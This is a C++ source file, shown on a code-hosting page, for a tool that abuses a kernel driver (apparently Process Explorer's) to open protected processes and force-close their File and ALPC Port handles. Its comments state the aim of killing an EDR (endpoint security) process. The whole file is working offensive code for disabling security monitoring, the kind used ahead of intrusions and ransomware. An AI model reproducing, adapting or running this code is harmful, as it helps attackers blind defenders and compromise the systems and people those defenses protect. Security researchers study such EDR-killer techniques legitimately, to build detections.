Repository navigation
Expand file tree
/
Copy pathDriver.cpp
More file actions
131 lines (109 loc) · 3.67 KB
/
Copy pathDriver.cpp
File metadata and controls
131 lines (109 loc) · 3.67 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
#pragma once
#include "Driver.h"
BOOL close_handle(HANDLE driverHandle, Procexp_close sProcexp)
{
DWORD bytes = 0;
BOOL ret = DeviceIoControl(driverHandle, IOCTL_CLOSE_HANDLE, &sProcexp, sizeof(sProcexp), NULL, 0, &bytes, NULL);
if (!ret) {
printf("[-] Error closing handle. (Error Code: %lu)\n", GetLastError());
return FALSE;
}
//printf("[!] Closed handle beloging to EDR: 0x%x\n", (UINT)sProcexp.handle);
return TRUE;
}
HANDLE open_handle(ULONGLONG PID, HANDLE hDriver)
{
HANDLE hProtectedProcess = NULL;
DWORD dwBytesReturned = 0;
BOOL ret = FALSE;
char* endptr = 0;
ret = DeviceIoControl(hDriver, IOCTL_OPEN_PROTECTED_PROCESS_HANDLE, &PID, sizeof(PID),
&hProtectedProcess, sizeof(HANDLE), &dwBytesReturned, NULL);
if (dwBytesReturned == 0 || !ret)
return NULL;
return hProtectedProcess;
}
int filter(unsigned int code)
{
/*Spaguetti code for debugging purpose*/
if (code == EXCEPTION_ACCESS_VIOLATION)
{
return EXCEPTION_EXECUTE_HANDLER;
}
else
return -1;
}
BOOL kill(HANDLE hDriver, HANDLE hProc, ULONGLONG PID)
{
Procexp_close sProcexp = { 0 };
BOOL handle = 0;
ULONGLONG returnLength = 0;
fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)malloc(SystemHandleInformationSize);
if (!handleTableInformation) {
printf("[-] Error allocating memory. (Error Code: %lu)\n", GetLastError());
return FALSE;
}
more:
NTSTATUS stat = NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength);
DWORD controler = 0;
ULONGLONG adjustLength;
while (stat == STATUS_INFO_LENGTH_MISMATCH) {
handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)realloc(handleTableInformation, returnLength);
adjustLength = returnLength;
stat = NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, adjustLength, &returnLength);
controler += 1;
}
if (stat != 0 && stat != STATUS_INFO_LENGTH_MISMATCH){
printf("[-] Error getting handles: (0x%x)\n", stat);
return FALSE;
}
DWORD counter = 0;
myPUBLIC_OBJECT_TYPE_INFORMATION info;
DWORD length;
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo;
for (ULONGLONG i = 0; i < handleTableInformation->NumberOfHandles; i++)
{
__try {
handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i];
}
__except (filter(GetExceptionCode())) /*Workaround to a fucking crash*/ {
if (handle == FALSE) {
printf("[-] returning with errors\n");
goto more;
}
goto return_handle_table;
}
if (handleInfo.UniqueProcessId == PID) /*If process which belongs the handle is our process */
{
// Obtain type of handle (name)
handle = TRUE;
NTSTATUS stat = NtQueryObject((HANDLE)handleInfo.Handle, ObjectTypeInformation, &info, sizeof(myPUBLIC_OBJECT_TYPE_INFORMATION), &length);
if (stat != 0) {
if (stat == 0xc0000008)
continue;
printf("Error: (0x%x) with handle: (0x%x)\n", stat, handleInfo.Handle);
return FALSE;
}
else
{
if (wcscmp(info.TypeName.Buffer, L"File") == 0 || wcscmp(info.TypeName.Buffer, L"ALPC Port") == 0) //Check if handle is type File
{
handle = TRUE;
sProcexp.pPid = PID;
sProcexp.handle = (ULONGLONG)handleInfo.Handle;
sProcexp.ObjectType = (PVOID)handleInfo.Object;
close_handle(hDriver, sProcexp); //Kill the EDR
counter += 1;
}
}
if (counter == 0x1000) { //Buffer is not long enough (We don't usually arrive to here)
printf("[-] Not completed\n");
return FALSE;
}
}
}
return_handle_table:
printf("[+] Process Killed\n");
return TRUE;
}